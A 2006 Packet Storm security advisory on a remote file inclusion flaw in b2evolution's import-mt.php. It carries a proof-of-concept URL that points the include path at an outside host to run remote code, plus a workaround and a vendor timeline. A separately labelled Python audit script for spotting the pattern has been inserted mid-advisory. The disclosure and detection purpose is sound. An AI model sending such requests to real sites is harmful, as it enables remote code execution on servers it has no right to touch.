b2evolution-rfi.txt

2006-12-01T00:00:00
ID PACKETSTORM:52624
Type packetstorm
Reporter tarkus
Modified 2006-12-01T00:00:00

Description

                                        
                                            `_________________________________________  
_________________________________________  
  
Severity: High  
Title: b2evolution Remote File Inclusion Vulnerability  
Date: 28.11.06  
Author: tarkus (tarkus (at) tiifp (dot) org)  
Web: https://tiifp.org/tarkus  
Vendor: b2evolution (http://b2evolution.net/)  
Affected Product(s): b2evolution 1.8.5 - 1.9 beta  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
Description:  
------------  
  
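Line 67 of import-mt.php (blogs/inc/CONTROL/imports) builds an include path from $inc_path, which can be supplied in the request when the file is accessed directly:  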
  
>  
>require_once $inc_path.'MODEL/files/_file.funcs.php';  
>  
  
  
  
PoC:  
----  
  
http://<victim>/<b2epath>/inc/CONTROL/import/import-mt.php?basepath= \  
foo&inc_path=https://tiifp.org/tarkus/PoC/  
  
Both register_globals and allow_url_fopen have to be On for this to work.  
  
  
Workaround:  
-----------  
  
Put the following line at the beginning of the file.  
  
if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page directly.' );  
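
Added example (not part of the advisory or of the b2evolution code base): a Python audit heuristic that flags PHP files in which an include/require takes its path from a variable the file has not assigned and that is reached before any EVO_MAIN_INIT check, which is the pattern described above. The function names and the sample PHP snippets are constructed for illustration.

```python
import os
import re
import sys

# Strings are matched so comment markers inside them are ignored; comments are blanked.
TOKEN = re.compile(r"""'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|/\*.*?\*/|(?://|#)[^\n]*""", re.S)
# include/require whose path starts with a variable, e.g. require_once $inc_path.'...';
INCLUDE_VAR = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)", re.I)
# Any test of the constant used by the workaround guard.
GUARD = re.compile(r"defined\s*\(\s*['\"]EVO_MAIN_INIT['\"]\s*\)", re.I)

def strip_comments(src):
    """Remove PHP comments, keeping string literals and line numbering intact."""
    def keep(m):
        tok = m.group()
        return tok if tok[0] in "'\"" else "\n" * tok.count("\n")
    return TOKEN.sub(keep, src)

def audit(src):
    """Return [(line, variable)] for variable-path includes reached before the guard."""
    code = strip_comments(src)
    guard = GUARD.search(code)
    limit = guard.start() if guard else len(code)
    findings = []
    for m in INCLUDE_VAR.finditer(code, 0, limit):
        name = m.group(1)
        # Heuristic: a variable assigned earlier in this file is not request-controlled.
        assigned = re.search(r"\$" + re.escape(name) + r"\s*=(?!=)", code[:m.start()])
        if not assigned:
            findings.append((code.count("\n", 0, m.start()) + 1, name))
    return findings

# Constructed samples: the include from the advisory, without and with the workaround.
VULNERABLE = "<?php\n// MT importer\nrequire_once $inc_path.'MODEL/files/_file.funcs.php';\n"
GUARDED = ("<?php\nif( !defined('EVO_MAIN_INIT') ) "
           "die( 'Please, do not access this page directly.' );\n"
           "require_once $inc_path.'MODEL/files/_file.funcs.php';\n")

if __name__ == "__main__":
    # Usage: python audit.py <source tree>; prints path:line and the variable.
    for root, _, files in os.walk(sys.argv[1] if len(sys.argv) > 1 else "."):
        for fn in files:
            if fn.endswith(".php"):
                path = os.path.join(root, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line, var in audit(fh.read()):
                        print(f"{path}:{line}: include path from ${var} before guard")
```

A hit is a candidate for review, not proof of a flaw: entry-point scripts that receive the variable from an earlier include will also be reported.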
  
  
  
Vendor Response:  
----------------  
  
Reported to Vendor: 10.11.06  
Vendor response: 10.11.06  
Patch in CVS: 10.11.06  
  
`